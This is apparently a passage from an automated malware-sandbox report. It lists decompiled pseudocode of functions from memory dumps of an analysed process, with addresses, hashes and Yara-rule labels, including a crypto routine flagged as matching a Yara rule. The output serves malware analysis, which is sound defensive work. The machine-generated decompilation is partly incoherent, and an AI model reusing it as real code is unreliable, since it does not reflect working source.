							return E01A2B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01A02280(_t28, 0x1ad8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E019FFFB0(_t42, _t53, 0x1ad8608);
							if(_t53 != 0) {
								L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E019FFFB0(_t41, _t51, 0x1ad8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x01a24a2c
0x01a24a34
0x01a24a3c
0x01a24a3e
0x01a24a48
0x01a24a4b
0x01a24a4d
0x01a24a51
0x01a24a9c
0x00000000
0x00000000
0x01a24aa3
0x01a24aa8
0x01a24aad
0x01a24ab1
0x01a24ade
0x01a24ae3
0x01a24a5a
0x01a24a62
0x01a24a6a
0x01a24a6e
0x01a5f203
0x01a24a84
0x01a24a88
0x01a24a89
0x01a24a8a
0x01a24a95
0x01a24a95
0x01a24a79
0x01a24a80
0x01a24af2
0x01a24af4
0x01a24af9
0x01a24aff
0x01a24b01
0x01a24b03
0x01a24b08
0x01a5f20a
0x01a5f212
0x01a5f216
0x01a5f216
0x01a24b08
0x01a24b13
0x01a24b1a
0x01a5f229
0x01a5f229
0x01a24b1a
0x01a24a82
0x00000000
0x01a24a82
0x01a24ab7
0x01a24acd
0x01a24acd
0x01a24ad5
0x01a24ada
0x00000000
0x01a24ada
0x01a24ac2
0x01a24acb
0x00000000
0x00000000
0x00000000
0x01a24acb
0x01a24a53
0x01a24a53
0x01a24a58
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aea41a83a243b48c0e548a577d71be64623a635ec888e5bd1f596f0ef64d0115
Instruction ID: 3e7b7cc2391ac9b668a86951f3edbcc3b16ccdb6ce5aefd65ffe4e05ee36bf63
Opcode Fuzzy Hash: aea41a83a243b48c0e548a577d71be64623a635ec888e5bd1f596f0ef64d0115
Instruction Fuzzy Hash: AC310332206B61EFC722DF5DC944B2ABBA4FFC9B10F04452DE9564B641CB70E804CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01A1E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E01A1E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E01A29670() < 0) {
					L01A3DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1ad7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L01A04620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M01A1E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x01a1e730
0x01a1e736
0x01a1e738
0x01a1e73d
0x01a1e73e
0x01a1e740
0x01a1e749
0x01a1e765
0x01a1e76a
0x01a1e76b
0x01a1e76c
0x01a1e76d
0x01a1e76e
0x01a1e76f
0x01a1e775
0x01a1e777
0x01a1e77e
0x01a5b675
0x01a1e784
0x01a1e784
0x01a1e789
0x01a1e7a8
0x01a1e7ac
0x01a1e807
0x01a1e7ae
0x01a1e7ae
0x01a1e7b1
0x01a1e7b4
0x01a1e7b9
0x01a1e7c0
0x01a1e7c4
0x01a1e7ca
0x01a1e7cc
0x00000000
0x01a1e7d3
0x01a1e7d6
0x00000000
0x00000000
0x01a1e7ff
0x01a1e802
0x00000000
0x00000000
0x01a1e7f9
0x01a1e7fc
0x00000000
0x00000000
0x01a1e7f3
0x01a1e7f6
0x00000000
0x00000000
0x01a1e7ed
0x01a1e7f0
0x00000000
0x00000000
0x01a1e7e7
0x01a1e7ea
0x00000000
0x00000000
0x01a5b685
0x01a5b688
0x00000000
0x00000000
0x01a5b682
0x00000000
0x00000000
0x01a1e7cc
0x01a1e7d9
0x01a1e7dc
0x01a1e7de
0x01a1e7de
0x01a1e7ac
0x01a1e7e4
0x01a1e74b
0x01a1e751
0x01a1e759
0x01a1e761
0x01a1e761

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d63a7ecbbb20f856c0ea93675aa86a34e8f0944d6a3341d3c2997e6586bfde26
Instruction ID: e0f287ccb12e6fb5c79c7235a6074e81b1ab32dd0745f9133c566867c3186777
Opcode Fuzzy Hash: d63a7ecbbb20f856c0ea93675aa86a34e8f0944d6a3341d3c2997e6586bfde26
Instruction Fuzzy Hash: FC316D75A14249EFE745CF58D941B9ABBE4FB09314F148256FE04CB341D631ED90CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01A1BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E01A1BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1ad6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E01A02280(0xd, 0x862f1a0);
				_t41 =  *0x1ad60f8; // 0x0
				if(_t41 != 0) {
					 *0x1ad60f8 =  *_t41;
					 *0x1ad60fc =  *0x1ad60fc + 0xffff;
				}
				E019FFFB0(_t41, 0x800, 0x862f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x1ad60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L01A04620(0x1ad6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1ad6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x01a1bc36
0x01a1bc42
0x01a1bc45
0x01a1bc4a
0x01a1bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x01a1bc50
0x01a1bc50
0x01a1bc58
0x01a1bc5a
0x01a1bc60
0x00000000
0x00000000
0x01a5a4f2
0x01a5a4f6
0x00000000
0x00000000
0x00000000
0x01a5a4fc
0x01a1bc79
0x01a1bc7e
0x01a1bc86
0x01a1bd16
0x01a1bd20
0x01a1bd20
0x01a1bc8d
0x01a1bc94
0x01a1bcbd
0x01a1bcca
0x01a1bccb
0x01a1bccc
0x01a1bccd
0x01a1bcce
0x01a1bcd4
0x01a1bcea
0x01a1bcee
0x01a1bcf2
0x01a1bd00
0x01a1bd04
0x00000000
0x01a1bc96
0x01a1bcab
0x01a1bcaf
0x01a1bd2c
0x01a1bd2c
0x01a1bd09
0x00000000
0x01a1bd09
0x01a1bcb1
0x01a1bcb5
0x01a1bcbb
0x00000000
0x00000000
0x00000000
0x01a1bcbb

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 471cb423be42f5de1dfd77cb1a96a2af13bb35ffd513e63e09fbbc851c33b8c7
Instruction ID: fea516e471227f61a6fe7f2c53e543839c6662e46065633ec3407f0a7832eb25
Opcode Fuzzy Hash: 471cb423be42f5de1dfd77cb1a96a2af13bb35ffd513e63e09fbbc851c33b8c7
Instruction Fuzzy Hash: C231047A601A169FCB12DF98D4807A677B4FF1C321F444079ED49DB24AE774D90ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01A11DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E01A11DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E01A0F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L01A04620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E01A0F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x01a11dc2
0x01a11dc5
0x01a11dc7
0x01a11dcc
0x01a11dce
0x01a11dd6
0x01a11ddf
0x01a11de0
0x01a11de1
0x01a11de5
0x01a11de8
0x01a11def
0x01a11df0
0x01a11df6
0x01a11df7
0x01a11dfe
0x01a11e1a
0x00000000
0x00000000
0x01a11e0b
0x01a11e12
0x01a11e12
0x01a11e00
0x01a11e00
0x01a11e05
0x01a11e1e
0x01a11e23
0x01a5570f
0x01a55713
0x00000000
0x00000000
0x01a55719
0x01a55719
0x01a11e2c
0x01a11e2d
0x01a11e2e
0x01a11e2f
0x01a11e31
0x01a11e32
0x01a11e35
0x01a11e3d
0x01a55723
0x01a5573d
0x01a5573d
0x00000000
0x01a55723
0x01a11e49
0x01a11e4e
0x01a11e4e
0x01a11e09
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: dbf09e42617dd0e3e71c7dc394308f6c6df2d3ca68ba80b1c6e65215a029e64e
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: E32190B6B00119FFD721CFA9DD80EBBBBBDEF85680F154155EA0597290D634AE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 019E9100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E019E9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x1abf6e8);
				E01A3D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E01AB88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E01A3D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x1ad86c0; // 0x14c07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x1ad86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01A02280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E01AB88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E01A2AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x1adb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x1ad84c0;
										if(_t69 >=  *0x1ad84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01AB9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E019E922A(_t82);
							_t53 = E01A07D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01AB8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x1ad86c0; // 0x14c07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x1ad86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x1ad86bc;
										_t72 = 0x1ad86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E019E9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x1ad86c4;
									_t72 = 0x1ad86c0;
									L18:
									E01A19B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x019e9100
0x019e9100
0x019e9100
0x019e9100
0x019e9102
0x019e9107
0x019e910c
0x019e9110
0x019e9115
0x019e9136
0x019e9143
0x01a437e4
0x01a437e4
0x019e9149
0x019e914e
0x019e914e
0x019e9117
0x019e911d
0x00000000
0x00000000
0x019e911f
0x019e9125
0x00000000
0x019e9151
0x019e9158
0x019e915d
0x019e9161
0x019e9168
0x01a43715
0x00000000
0x019e916e
0x019e916e
0x019e9175
0x019e9177
0x019e917e
0x019e917f
0x019e9182
0x019e9182
0x019e9187
0x019e9187
0x019e918a
0x019e918d
0x019e918f
0x019e9192
0x019e9195
0x019e9198
0x019e9198
0x019e9198
0x019e919a
0x00000000
0x00000000
0x01a4371f
0x01a43721
0x01a43727
0x01a4372f
0x01a43733
0x01a43735
0x01a43738
0x01a4373b
0x01a4373d
0x01a43740
0x00000000
0x00000000
0x01a43746
0x01a43749
0x00000000
0x00000000
0x01a4374f
0x01a43751
0x00000000
0x00000000
0x01a43757
0x01a43759
0x01a4375c
0x01a4375c
0x01a4375e
0x01a4375e
0x01a43761
0x01a43764
0x00000000
0x00000000
0x01a43766
0x01a43768
0x01a437a3
0x01a437a3
0x01a437a5
0x01a437a7
0x01a437ad
0x01a437b0
0x01a437b2
0x01a437bc
0x01a437c2
0x01a437c2
0x01a437b2
0x019e9187
0x019e9187
0x019e918a
0x019e918d
0x019e918f
0x019e9192
0x019e9195
0x00000000
0x019e9195
0x00000000
0x019e9187
0x01a4376a
0x01a4376a
0x01a4376c
0x01a4376c
0x01a4376f
0x01a43775
0x00000000
0x00000000
0x01a43777
0x01a43779
0x00000000
0x00000000
0x01a43782
0x01a43787
0x01a43789
0x01a43790
0x01a43790
0x01a4378b
0x01a4378b
0x01a4378b
0x01a43792
0x01a43795
0x01a43795
0x01a43798
0x01a43798
0x01a4379b
0x01a4379b
0x019e91a3
0x019e91a9
0x019e91b0
0x019e91b4
0x019e91b4
0x019e91bb
0x019e91c0
0x019e91c5
0x019e91c7
0x01a437da
0x019e91cd
0x019e91cd
0x019e91cd
0x019e91d2
0x019e91d5
0x019e9239
0x019e9239
0x019e91d7
0x019e91db
0x019e91e1
0x019e91e7
0x019e91fd
0x019e9203
0x019e921e
0x019e9223
0x00000000
0x019e9223
0x019e9205
0x019e9208
0x019e920c
0x019e9214
0x019e9214
0x019e91e9
0x019e91e9
0x019e91ee
0x019e91f3
0x019e91f3
0x019e91f3
0x019e91e7
0x00000000
0x019e91db
0x019e9187
0x019e9168

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1030e576ffb0b39233645e2cb5fc3c20311bdfbccace50b4d9afbe0e5cfe0288
Instruction ID: cddb0b13c59f4673f17aa6ffe7f8cd2e2571e1ed7d88e71533941654e03821b1
Opcode Fuzzy Hash: 1030e576ffb0b39233645e2cb5fc3c20311bdfbccace50b4d9afbe0e5cfe0288
Instruction Fuzzy Hash: 3D318C75A01685DFDB23DBACC58CBACBBF5BB89368F188149D50967242C334E980CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00401174, Relevance: .1, Instructions: 85
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E00401174(signed int __eax, unsigned int __ecx, signed int __esi, char _a1, signed char _a4) {
				void* _v1;
				signed char _v5;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed char _v20;
				void* __ebx;
				signed int __edi;
				signed char _t37;
				unsigned int _t48;
				signed char _t49;

				_t37 = __eax | 0x00000086;
				 *0xdd1c6929 = _t37;
				if( &_a1 != 0) {
					_t48 = ((( *(_t37 + 1) & 0x000000ff) << 0x00000008 | __esi) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t49 & 0x000000ff) >> 0x00000001;
					 *_t37 = _t48 >> 0x18;
					 *(_t37 + 1) = _t48 >> 0x10;
					 *((char*)(_t37 + 6)) = __ecx >> 8;
					 *((char*)(_t37 + 2)) = _t48 >> 8;
					 *(_t37 + 3) = _t48;
					return _t37;
				} else {
					asm("salc");
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x10;
					__eax = 0;
					 *__esi = 0;
					__esi[1] = 0;
					__esi[2] = 0;
					__esi[3] = 0;
					__eax =  *__ecx;
					__edx =  *(__ecx + 4);
					_v20 =  *__ecx;
					__eax =  *(__ecx + 8);
					__ecx =  *(__ecx + 0xc);
					_push(__ebx);
					_push(__edi);
					_v16 = __edx;
					_v12 = __eax;
					_v8 = __ecx;
					__ebx = 0;
					do {
						__edi = 7;
						do {
							__eax = _a4;
							__edx = 1;
							__ecx = __edi;
							__edx = 1 << __cl;
							if(( *(__ebx + _a4) & __dl) != 0) {
								__ecx = _v20;
								 *__esi =  *__esi ^ _v20;
								__edx = _v16;
								__esi[1] = __esi[1] ^ _v16;
								__ecx = _v12;
								__edx = _v8;
								__esi[2] = __esi[2] ^ _v12;
								__esi[3] = __esi[3] ^ _v8;
							}
							__eax =  &_v20;
							if((_v5 & 0x00000001) == 0) {
								__eax = E00401030( &_v20);
							} else {
								__eax = E00401030( &_v20);
								_v20 = _v20 ^ 0x000000e1;
							}
							__edi = __edi - 1;
						} while (__edi > 0xffffffff);
						__ebx = __ebx + 1;
					} while (__ebx < 0x10);
					_pop(__edi);
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				}
			}

0x00401174
0x00401178
0x0040117d
0x0040114f
0x00401156
0x0040115d
0x00401169
0x0040116c
0x0040116f
0x00401173
0x0040117f
0x0040117f
0x00401180
0x00401181
0x00401183
0x00401186
0x00401188
0x0040118a
0x0040118d
0x00401190
0x00401193
0x00401195
0x00401198
0x0040119b
0x0040119e
0x004011a1
0x004011a2
0x004011a3
0x004011a6
0x004011a9
0x004011ac
0x004011b0
0x004011b0
0x004011b5
0x004011b5
0x004011b8
0x004011bd
0x004011bf
0x004011c4
0x004011c6
0x004011c9
0x004011cb
0x004011ce
0x004011d1
0x004011d4
0x004011d7
0x004011da
0x004011da
0x004011e1
0x004011e4
0x004011f1
0x004011e6
0x004011e6
0x004011eb
0x004011eb
0x004011f6
0x004011f7
0x004011fc
0x004011fd
0x00401202
0x00401203
0x00401204
0x00401206
0x00401207
0x00401207

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55bafe597039edb3377f5bb1a008ef2a6ab4e2489b1867d93fcd88a508018938
Instruction ID: 2759a25ed6fbcf54fa2fa815cd32a584dbd31fe8eff4073ba4e78b47c47b80a9
Opcode Fuzzy Hash: 55bafe597039edb3377f5bb1a008ef2a6ab4e2489b1867d93fcd88a508018938
Instruction Fuzzy Hash: FA31E530A047449FC70CCB6DC48056ABFF2EF89310B54C6AEC9AA9B3E2C6759806CB54

Uniqueness

Uniqueness Score: -1.00%

Function 01A00050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E01A00050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x1add360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E01A19ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E01A2B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01AB8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E01A19702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x1adb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x01a00055
0x01a0005d
0x01a00062
0x01a0006c
0x01a0006f
0x01a00074
0x01a0007a
0x01a0007a
0x01a00080
0x01a00080
0x01a00087
0x01a0008d
0x01a0008f
0x01a00093
0x01a00095
0x01a0009b
0x01a000f8
0x01a000fb
0x01a000fc
0x01a000ff
0x01a00108
0x01a00108
0x01a000a2
0x01a000a6
0x01a000b3
0x01a000bc
0x01a000c5
0x01a000ca
0x01a4c01e
0x00000000
0x00000000
0x01a4c02d
0x01a000d5
0x01a000d9
0x01a4c03d
0x01a4c046
0x01a4c046
0x01a000df
0x01a000e2
0x01a000ea
0x01a000ef
0x01a000f2
0x01a000f6
0x01a00111
